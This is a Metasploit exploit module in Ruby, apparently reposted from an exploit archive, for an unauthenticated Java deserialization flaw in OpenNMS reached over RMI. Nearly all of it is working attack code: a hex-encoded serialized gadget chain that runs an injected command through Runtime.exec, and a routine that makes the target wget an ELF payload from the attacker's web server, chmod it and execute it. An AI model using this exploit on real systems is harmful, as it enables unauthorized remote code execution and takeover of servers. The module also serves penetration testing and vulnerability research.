OpenNMS Java Object Unserialization Remote Code Execution
Posted on 19 October 2016
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Java::Rmi::Client include Msf::Exploit::Remote::HttpServer include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'OpenNMS Java Object Unserialization Remote Code Execution', 'Description' => %q( This module exploits a vulnerability in the OpenNMS Java object which allows an unauthenticated attacker to run arbitary code against the system. ), 'Author' => [ 'Ben Turner <benpturner[at]yahoo.com>', # @benpturner ], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/' ] ], 'Targets' => [ [ 'OpenNMS / Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ], [ 'OpenNMS / Linux x86_64', { 'Arch' => ARCH_X86_64, 'Platform' => 'linux' } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 19 2014' ) ) register_options( [ Opt::RPORT(1099), OptString.new('WRITABLEDIR', [false, 'A writable directory on the host', '/tmp/']) ], self.class) end # This is the execute function that is re-used throughout def exec_command(cmd) vprint_status("#{peer} - Downloading the file #{cmd}") # Do the exploit command bit data1 = "x4ax52x4dx49x00x02x4b" data2 = "x00x09x31x32x37x2Ex30x2Ex31x2Ex31x00x00x00x00x50xACxEDx00x05x77x22x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x44x15x4DxC9xD4xE6x3BxDFx74x00x05x70x77x6Ex65x64x73x7Dx00x00x00x01x00x0Fx6Ax61x76x61x2Ex72x6Dx69x2Ex52x65x6Dx6Fx74x65x70x78x72x00x17x6Ax61x76x61x2Ex6Cx61x6Ex67x2Ex72x65x66x6Cx65x63x74x2Ex50x72x6Fx78x79xE1x27xDAx20xCCx10x43xCBx02x00x01x4Cx00x01x68x74x00x25x4Cx6Ax61x76x61x2Fx6Cx61x6Ex67x2Fx72x65x66x6Cx65x63x74x2Fx49x6Ex76x6Fx63x61x74x69x6Fx6Ex48x61x6Ex64x6Cx65x72x3Bx70x78x70x73x72x00x32x73x75x6Ex2Ex72x65x66x6Cx65x63x74x2Ex61x6Ex6Ex6Fx74x61x74x69x6Fx6Ex2Ex41x6Ex6Ex6Fx74x61x74x69x6Fx6Ex49x6Ex76x6Fx63x61x74x69x6Fx6Ex48x61x6Ex64x6Cx65x72x55xCAxF5x0Fx15xCBx7ExA5x02x00x02x4Cx00x0Cx6Dx65x6Dx62x65x72x56x61x6Cx75x65x73x74x00x0Fx4Cx6Ax61x76x61x2Fx75x74x69x6Cx2Fx4Dx61x70x3Bx4Cx00x04x74x79x70x65x74x00x11x4Cx6Ax61x76x61x2Fx6Cx61x6Ex67x2Fx43x6Cx61x73x73x3Bx70x78x70x73x72x00x11x6Ax61x76x61x2Ex75x74x69x6Cx2Ex48x61x73x68x4Dx61x70x05x07xDAxC1xC3x16x60xD1x03x00x02x46x00x0Ax6Cx6Fx61x64x46x61x63x74x6Fx72x49x00x09x74x68x72x65x73x68x6Fx6Cx64x70x78x70x3Fx40x00x00x00x00x00x0Cx77x08x00x00x00x10x00x00x00x01x71x00x7Ex00x00x73x71x00x7Ex00x05x73x7Dx00x00x00x01x00x0Dx6Ax61x76x61x2Ex75x74x69x6Cx2Ex4Dx61x70x70x78x71x00x7Ex00x02x73x71x00x7Ex00x05x73x72x00x2Ax6Fx72x67x2Ex61x70x61x63x68x65x2Ex63x6Fx6Dx6Dx6Fx6Ex73x2Ex63x6Fx6Cx6Cx65x63x74x69x6Fx6Ex73x2Ex6Dx61x70x2Ex4Cx61x7Ax79x4Dx61x70x6ExE5x94x82x9Ex79x10x94x03x00x01x4Cx00x07x66x61x63x74x6Fx72x79x74x00x2Cx4Cx6Fx72x67x2Fx61x70x61x63x68x65x2Fx63x6Fx6Dx6Dx6Fx6Ex73x2Fx63x6Fx6Cx6Cx65x63x74x69x6Fx6Ex73x2Fx54x72x61x6Ex73x66x6Fx72x6Dx65x72x3Bx70x78x70x73x72x00x3Ax6Fx72x67x2Ex61x70x61x63x68x65x2Ex63x6Fx6Dx6Dx6Fx6Ex73x2Ex63x6Fx6Cx6Cx65x63x74x69x6Fx6Ex73x2Ex66x75x6Ex63x74x6Fx72x73x2Ex43x68x61x69x6Ex65x64x54x72x61x6Ex73x66x6Fx72x6Dx65x72x30xC7x97xECx28x7Ax97x04x02x00x01x5Bx00x0Dx69x54x72x61x6Ex73x66x6Fx72x6Dx65x72x73x74x00x2Dx5Bx4Cx6Fx72x67x2Fx61x70x61x63x68x65x2Fx63x6Fx6Dx6Dx6Fx6Ex73x2Fx63x6Fx6Cx6Cx65x63x74x69x6Fx6Ex73x2Fx54x72x61x6Ex73x66x6Fx72x6Dx65x72x3Bx70x78x70x75x72x00x2Dx5Bx4Cx6Fx72x67x2Ex61x70x61x63x68x65x2Ex63x6Fx6Dx6Dx6Fx6Ex73x2Ex63x6Fx6Cx6Cx65x63x74x69x6Fx6Ex73x2Ex54x72x61x6Ex73x66x6Fx72x6Dx65x72x3BxBDx56x2AxF1xD8x34x18x99x02x00x00x70x78x70x00x00x00x05x73x72x00x3Bx6Fx72x67x2Ex61x70x61x63x68x65x2Ex63x6Fx6Dx6Dx6Fx6Ex73x2Ex63x6Fx6Cx6Cx65x63x74x69x6Fx6Ex73x2Ex66x75x6Ex63x74x6Fx72x73x2Ex43x6Fx6Ex73x74x61x6Ex74x54x72x61x6Ex73x66x6Fx72x6Dx65x72x58x76x90x11x41x02xB1x94x02x00x01x4Cx00x09x69x43x6Fx6Ex73x74x61x6Ex74x74x00x12x4Cx6Ax61x76x61x2Fx6Cx61x6Ex67x2Fx4Fx62x6Ax65x63x74x3Bx70x78x70x76x72x00x11x6Ax61x76x61x2Ex6Cx61x6Ex67x2Ex52x75x6Ex74x69x6Dx65x00x00x00x00x00x00x00x00x00x00x00x70x78x70x73x72x00x3Ax6Fx72x67x2Ex61x70x61x63x68x65x2Ex63x6Fx6Dx6Dx6Fx6Ex73x2Ex63x6Fx6Cx6Cx65x63x74x69x6Fx6Ex73x2Ex66x75x6Ex63x74x6Fx72x73x2Ex49x6Ex76x6Fx6Bx65x72x54x72x61x6Ex73x66x6Fx72x6Dx65x72x87xE8xFFx6Bx7Bx7CxCEx38x02x00x03x5Bx00x05x69x41x72x67x73x74x00x13x5Bx4Cx6Ax61x76x61x2Fx6Cx61x6Ex67x2Fx4Fx62x6Ax65x63x74x3Bx4Cx00x0Bx69x4Dx65x74x68x6Fx64x4Ex61x6Dx65x74x00x12x4Cx6Ax61x76x61x2Fx6Cx61x6Ex67x2Fx53x74x72x69x6Ex67x3Bx5Bx00x0Bx69x50x61x72x61x6Dx54x79x70x65x73x74x00x12x5Bx4Cx6Ax61x76x61x2Fx6Cx61x6Ex67x2Fx43x6Cx61x73x73x3Bx70x78x70x75x72x00x13x5Bx4Cx6Ax61x76x61x2Ex6Cx61x6Ex67x2Ex4Fx62x6Ax65x63x74x3Bx90xCEx58x9Fx10x73x29x6Cx02x00x00x70x78x70x00x00x00x02x74x00x0Ax67x65x74x52x75x6Ex74x69x6Dx65x75x72x00x12x5Bx4Cx6Ax61x76x61x2Ex6Cx61x6Ex67x2Ex43x6Cx61x73x73x3BxABx16xD7xAExCBxCDx5Ax99x02x00x00x70x78x70x00x00x00x00x74x00x09x67x65x74x4Dx65x74x68x6Fx64x75x71x00x7Ex00x24x00x00x00x02x76x72x00x10x6Ax61x76x61x2Ex6Cx61x6Ex67x2Ex53x74x72x69x6Ex67xA0xF0xA4x38x7Ax3BxB3x42x02x00x00x70x78x70x76x71x00x7Ex00x24x73x71x00x7Ex00x1Cx75x71x00x7Ex00x21x00x00x00x02x70x75x71x00x7Ex00x21x00x00x00x00x74x00x06x69x6Ex76x6Fx6Bx65x75x71x00x7Ex00x24x00x00x00x02x76x72x00x10x6Ax61x76x61x2Ex6Cx61x6Ex67x2Ex4Fx62x6Ax65x63x74x00x00x00x00x00x00x00x00x00x00x00x70x78x70x76x71x00x7Ex00x21x73x71x00x7Ex00x1Cx75x72x00x13x5Bx4Cx6Ax61x76x61x2Ex6Cx61x6Ex67x2Ex53x74x72x69x6Ex67x3BxADxD2x56xE7xE9x1Dx7Bx47x02x00x00x70x78x70x00x00x00x01x74x00" data2 += cmd.length.chr data2 += cmd data2 += "x74x00x04x65x78x65x63x75x71x00x7Ex00x24x00x00x00x01x71x00x7Ex00x29x73x71x00x7Ex00x17x73x72x00x11x6Ax61x76x61x2Ex6Cx61x6Ex67x2Ex49x6Ex74x65x67x65x72x12xE2xA0xA4xF7x81x87x38x02x00x01x49x00x05x76x61x6Cx75x65x70x78x72x00x10x6Ax61x76x61x2Ex6Cx61x6Ex67x2Ex4Ex75x6Dx62x65x72x86xACx95x1Dx0Bx94xE0x8Bx02x00x00x70x78x70x00x00x00x01x73x71x00x7Ex00x09x3Fx40x00x00x00x00x00x10x77x08x00x00x00x10x00x00x00x00x78x78x76x72x00x12x6Ax61x76x61x2Ex6Cx61x6Ex67x2Ex4Fx76x65x72x72x69x64x65x00x00x00x00x00x00x00x00x00x00x00x70x78x70x71x00x7Ex00x3Fx78x71x00x7Ex00x3F" begin connect sock.put(data1) # Wait for a successful response data = recv_protocol_ack # rescue nil unless data fail_with(Failure::Unknown, "This system has not responded with the correct RMI header") end # Send the RMI payload sock.put(data2) # Disconnect disconnect rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the host") end end # Wget the file onto the host in the temp directory def wget_payload resource_uri = '/' + @dropped_elf if datastore['SRVHOST'] == "0.0.0.0" || datastore['SRVHOST'] == "::" srv_host = Rex::Socket.source_address(rhost) else srv_host = datastore['SRVHOST'] end service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri vprint_status("#{peer} - Starting up our web service on #{service_url} ...") start_service( 'Uri' => { 'Proc' => proc { |cli, req| on_request_uri(cli, req) }, 'Path' => resource_uri } ) exec_command("wget -P #{datastore['WRITABLEDIR']} #{service_url}") Rex.sleep(15) end # Change permissions to permit binary execution def chmod_payload cmd = "chmod +x #{File.join(datastore['WRITABLEDIR'], @dropped_elf)}" vprint_status("#{peer} - Chmod the payload...") res = exec_command(cmd) fail_with(Failure::Unknown, "#{peer} - Unable to chmod payload") unless res Rex.sleep(1) end # Execute payload on host def exec_payload cmd = File.join(datastore['WRITABLEDIR'], @dropped_elf) vprint_status("#{peer} - Executing the payload...") res = exec_command(cmd) fail_with(Failure::Unknown, "#{peer} - Unable to exec payload") unless res Rex.sleep(1) end # Handle incoming requests from the server def on_request_uri(cli, _request) vprint_status("#{peer} - Sending the payload to the server...") send_response(cli, generate_payload_exe) end # Create the payload and run the commands in succcession def exploit print_status("#{peer} - Exploting the vulnerable service...") @payload_url = '' @dropped_elf = rand_text_alpha(rand(5) + 3) wget_payload chmod_payload exec_payload end end
